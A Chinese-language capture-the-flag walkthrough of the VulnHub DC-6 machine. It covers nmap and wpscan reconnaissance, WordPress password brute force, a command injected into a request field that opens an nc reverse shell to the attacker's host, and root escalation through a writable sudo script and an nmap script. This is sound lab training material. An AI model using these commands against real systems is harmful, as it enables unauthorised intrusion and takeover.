vulnhub DC-6靶机实战

	0X01 环境部署 1.下载地址 https://www.vulnhub.com/entry/dc-6,315/ 安装好并将网络置为NET模式 kali net模式 DC-6 net模式 0X02 信息收集 1.主机发现 arpscan -l kali  192.168.190.128 DC-6  192.168.190.134 2.端口收集 nmap -sS 192.168.190.134 发现存在80端口，可以进行查看，直接查看跳转到了http://wordy/ 与DC-2问题类似需要修改自己本地的host文件 192.168.190.134 wordy 访问成功 3.目录扫描 python3 dirsearch.py -u http://192.168.190.134/ 成功找到后台登陆页面 http://wordy/wp-login.php 4.查看网站配置 wordpress cms 0X03 Getshell 1.漏洞发现 根据已知cms，可以进行搜索历史漏洞或者去登录到后台进行getshell 目前已知后台地址，可以进行爆破，爆破之前尝试弱口令：admin/admin 另一个账号采用admin1 经过测试，admin账户是存在的只不过密码不对，而admin1此账户不存在，所以两次回显页面不同 针对wordpress cms 可以利用kali自带的wpscan进行爆破密码 wpscan --url http://wordy -e u  # 爆破对应网站有多少个用户 经过测试五个用户，将此五个用户写入到一个user.txt 文档中 admin  graham  sarah  mark  jens 密码可以利用kali自带的密码文档 位置在/usr/share/wordlists/rockyou.txt.gz cd /usr/share/wordlists cp rockyou.txt /home/kali/rockyou.txt ls 再次利用wpscan进行爆破 wpscan --url http://wordy -P rockyou.txt -U user.txt 爆破出来一个用户的账号和密码，尝试登陆 mark/helpdesk01 登录成功 经过检查找到一个可以利用的点 2.漏洞利用 进行抓包测试 可以看到可以执行命令，所以进行反弹shell 3.反弹shell kali 开启监听 nc -lvnp 5678 在已经抓取的包中进行修改 qq.com|nc -e /bin/bash 192.168.190.128 5678 进行交互式shell python -c 'import pty;pty.spawn("/bin/bash")' 0X04 提权 1.当前权限 whoami    # www-data 首先查看mark用户下的文件 cd /home ls cd mark ls cd stuff ls cat things-to-do.txt 得到了另一个用户的账号密码 graham/GSo7isUM1D4 尝试登陆网站，结果登录失败 端口扫描时，有个22端口可以尝试ssh登录 ssh graham@192.168.190.134 2.常用提权 sudo -l 出现jens免登录的提示 cd .. cd jens ls cat backups.sh 3.漏洞提权 进行查看之后可以看到是有两条命令，可以再写入一个shell的命令 echo "/bin/bash" >> backups.sh 然后以管理员身份来运行 sudo -u jens ./backups.sh sudo -l 可以看到jens又可以以管理员身份运行nmap，所以考虑到可以利用nmap进行提权 4.开始提权 写入一个shell的脚本文件，写入的命令由nmap来执行 echo 'os.execute("/bin/bash")' >> shell nmap执行getshell的脚本命令 sudo nmap --script=shell 提权成功，切换到root目录下进行查看 cd root ls cat theflag.txt 0X05 总结 1.首先收集信息，真实ip，端口，网站目录，网站部署部件等 2.利用已知cms进行查找后台地址 3.利用wpscan进行爆破用户和密码 4.利用后台进行getshell 5.利用每个用户家目录下的文件进行达到最后的提权效果 6.提权成功查看flag